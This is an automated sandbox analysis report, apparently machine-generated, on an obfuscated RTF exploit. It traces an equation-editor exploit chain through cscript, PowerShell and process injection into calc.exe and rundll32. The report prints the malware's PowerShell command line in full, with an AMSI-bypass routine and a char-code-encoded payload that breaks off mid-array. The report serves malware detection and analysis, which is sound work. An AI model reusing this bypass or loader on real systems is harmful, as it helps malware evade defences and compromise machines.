Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A2010C NtOpenDirectoryObject,	10_2_00A2010C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A21148 NtOpenThread,	10_2_00A21148
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A207AC NtCreateMutant,	10_2_00A207AC
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1F8CC NtWaitForSingleObject,	10_2_00A1F8CC
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A21930 NtSetContextThread,	10_2_00A21930
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1F938 NtWriteFile,	10_2_00A1F938
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FAB8 NtQueryValueKey,	10_2_00A1FAB8
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FA20 NtQueryInformationFile,	10_2_00A1FA20
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FA50 NtEnumerateValueKey,	10_2_00A1FA50
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FBE8 NtQueryVirtualMemory,	10_2_00A1FBE8
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FB50 NtCreateKey,	10_2_00A1FB50
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FC30 NtOpenProcess,	10_2_00A1FC30
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A20C40 NtGetContextThread,	10_2_00A20C40
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FC48 NtSetInformationFile,	10_2_00A1FC48
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A21D80 NtSuspendThread,	10_2_00A21D80
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FD5C NtEnumerateKey,	10_2_00A1FD5C
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FE24 NtWriteVirtualMemory,	10_2_00A1FE24
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FFFC NtCreateProcessEx,	10_2_00A1FFFC
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A1FF34 NtQueueApcThread,	10_2_00A1FF34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025500C4 NtCreateFile,LdrInitializeThunk,	12_2_025500C4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025507AC NtCreateMutant,LdrInitializeThunk,	12_2_025507AC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,	12_2_0254FAD0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FAE8 NtQueryInformationProcess,LdrInitializeThunk,	12_2_0254FAE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FAB8 NtQueryValueKey,LdrInitializeThunk,	12_2_0254FAB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FB50 NtCreateKey,LdrInitializeThunk,	12_2_0254FB50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FB68 NtFreeVirtualMemory,LdrInitializeThunk,	12_2_0254FB68
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FBB8 NtQueryInformationToken,LdrInitializeThunk,	12_2_0254FBB8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254F900 NtReadFile,LdrInitializeThunk,	12_2_0254F900
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254F9F0 NtClose,LdrInitializeThunk,	12_2_0254F9F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,	12_2_0254FED0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FFB4 NtCreateSection,LdrInitializeThunk,	12_2_0254FFB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FC60 NtMapViewOfSection,LdrInitializeThunk,	12_2_0254FC60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FDC0 NtQuerySystemInformation,LdrInitializeThunk,	12_2_0254FDC0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FD8C NtDelayExecution,LdrInitializeThunk,	12_2_0254FD8C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02550048 NtProtectVirtualMemory,	12_2_02550048
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02550078 NtResumeThread,	12_2_02550078
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02550060 NtQuerySection,	12_2_02550060
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025510D0 NtOpenProcessToken,	12_2_025510D0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02551148 NtOpenThread,	12_2_02551148
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0255010C NtOpenDirectoryObject,	12_2_0255010C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_025501D4 NtSetValueKey,	12_2_025501D4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FA50 NtEnumerateValueKey,	12_2_0254FA50
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FA20 NtQueryInformationFile,	12_2_0254FA20
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FBE8 NtQueryVirtualMemory,	12_2_0254FBE8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254F8CC NtWaitForSingleObject,	12_2_0254F8CC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02551930 NtSetContextThread,	12_2_02551930
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254F938 NtWriteFile,	12_2_0254F938
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FE24 NtWriteVirtualMemory,	12_2_0254FE24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FEA0 NtReadVirtualMemory,	12_2_0254FEA0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FF34 NtQueueApcThread,	12_2_0254FF34
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FFFC NtCreateProcessEx,	12_2_0254FFFC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02550C40 NtGetContextThread,	12_2_02550C40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FC48 NtSetInformationFile,	12_2_0254FC48
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FC30 NtOpenProcess,	12_2_0254FC30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FC90 NtUnmapViewOfSection,	12_2_0254FC90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0254FD5C NtEnumerateKey,	12_2_0254FD5C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_02551D80 NtSuspendThread,	12_2_02551D80
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000EA360 NtCreateFile,	12_2_000EA360
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000EA410 NtReadFile,	12_2_000EA410
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000EA490 NtClose,	12_2_000EA490
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000EA540 NtAllocateVirtualMemory,	12_2_000EA540
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000EA35B NtCreateFile,	12_2_000EA35B

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: unknown	Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell $a=[Ref].Assembly.GetTypes();Foreach($b in $a) {if ($b.Name -like 'iUtils') {$c=$b}};$d=$c.GetFields('NonPublic,Static');Foreach($e in $d) {if ($e.Name -like 'Context') {$f=$e}};$g=$f.GetValue($null);[IntPtr]$ptr=$g;[Int32[]]$buf = @(0);[System.Runtime.InteropServices.Marshal]::Copy($buf, 0, $ptr, 1);$0462662046266204626620462662046266204626620462662=@(91,82,101,102,93,46,65,115,115,101,109,98,108,121,46,71,101,116,84,121,112,101,40,39,83,121,39,43,39,115,116,101,109,46,39,43,39,77,97,110,97,39,43,39,103,101,109,39,43,39,101,110,116,39,43,39,46,65,117,116,111,109,39,43,39,97,116,105,111,39,43,39,110,46,39,43,36,40,91,67,72,65,114,93,40,57,56,45,51,51,41,43,91,99,72,65,114,93,40,49,50,52,45,49,53,41,43,91,99,104,65,82,93,40,49,49,53,41,43,91,67,72,97,82,93,40,91,66,89,116,101,93,48,120,54,57,41,41,43,39,85,116,105,108,115,39,41,46,71,101,116,70,105,101,108,100,40,36,40,91,67,104,65,114,93,40,91,98,121,116,101,93,48,120,54,49,41,43,91,99,104,97,82,93,40,91,98,89,116,69,93,48,120,54,68,41,43,91,99,104,97,114,93,40,91,98,121,84,101,93,48,120,55,51,41,43,91,99,104,65,114,93,40,49,49,48,45,53,41,43,91,99,104,65,82,93,40,91,66,89,84,69,93,48,120,52,57,41,43,91,99,72,97,82,93,40,57,54,56,48,47,56,56,41,43,91,99,72,97,82,93,40,49,48,53,41,43,91,67,104,97,114,93,40,91,98,89,116,101,93,48,120,55,52,41,43,91,67,104,97,114,93,40,91,66,89,84,69,93,48,120,52,54,41,43,91,99,104,97,114,93,40,49,52,56,45,53,49,41,43,91,99,72,65,82,93,40,57,53,53,53,47,57,49,41,43,91,67,104,65,82,93,40,49,48,56,41,43,91,67,104,65,114,93,40,54,50,54,50,47,54,50,41,43,91,67,104,65,82,93,40,91,98,89,84,69,93,48,120,54,52,41,41,44,39,78,111,110,80,117,98,108,105,99,44,83,116,97,116,105,99,39,41,46,83,101,116,86,97,108,117,101,40,36,110,117,108,108,44,36,116,114,117,101,41,59,40,36,68,48,48,70,57,70,49,85,67,54,61,36,68,48,48,70,57,70,49,85,67,54,61,87,114,105,116,101,45,72,111,115,116,32,39,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,53,67,66,48,50,65,53,50,65,48,56,49,56,51,48,54,50,65,54,70,65,65,65,68,48,48,70,57,70,49,85,67,54,48,53,48,69,69,57,53,69,39,41,59,100,111,32,123,36,112,105,110,103,32,61,32,116,101,115,116,45,99,111,110,110,101,99,116,105,111,110,32,45,99,111,109,112,32,103,111,111,103,108,101,46,99,111,109,32,45,99,111,117,110,116,32,49,32,45,81,117,105,101,116,125,32,117,110,116,105,108,32,40,36,112,105,110,103,41,59,36,66,48,50,65,53,50,65,48,56,49,32,61,32,91,69,110,117,109,93,58,58,84,111,79,98,106,101,99,116,40,91,83,121,115,116,101,109,46,78,101,116,46,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,84,121,112,101,93,44,32,51,48,55,50,41,59,91,83,121,115,116,101,109,46,78,101,116,46,83,101,114,118,105,99,101,80,111,105,110,116,77,97,110,97,103,101,114,93,58,58,83,101,99,117,114,105,116,121,80,114,111,116,111,99,111,108,32,61,32,36,66,48,50,65,53,50,65,
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\calc.exe {path}
Source: C:\Windows\explorer.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Windows\SysWOW64\cmd.exe CmD.exe /C cscript %tmp%\Client.vbs A C	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cscript.exe cscript C:\Users\user\AppData\Local\Temp\Client.vbs A C	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\calc.exe {path}	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\WINDOWS\syswow64\calc.exe"	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\explorer.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Windows Analysis Report SecuriteInfo.com.Exploit.Rtf.Obfuscated.32.15350.12171

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted Domains

Contacted URLs

Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_004168F2 push edi; iretd	10_2_004168F3
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00417A03 push edi; retf	10_2_00417A04
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041D4B5 push eax; ret	10_2_0041D508
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041D56C push eax; ret	10_2_0041D572
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00417D6E push 00000013h; retf	10_2_00417D76
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041D502 push eax; ret	10_2_0041D508
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_0041D50B push eax; ret	10_2_0041D572
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_004175E0 push ds; retf	10_2_004175F2
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00405F1A push ebx; ret	10_2_00405F1E
Source: C:\Windows\SysWOW64\calc.exe	Code function: 10_2_00A2DFA1 push ecx; ret	10_2_00A2DFB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_0255DFA1 push ecx; ret	12_2_0255DFB4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000ED4B5 push eax; ret	12_2_000ED508
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000ED50B push eax; ret	12_2_000ED572
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000ED502 push eax; ret	12_2_000ED508
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000ED56C push eax; ret	12_2_000ED572
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000E75E0 push ds; retf	12_2_000E75F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000E68F2 push edi; iretd	12_2_000E68F3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000E7A03 push edi; retf	12_2_000E7A04
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000E7D6E push 00000013h; retf	12_2_000E7D76
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 12_2_000D5F1A push ebx; ret	12_2_000D5F1E

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
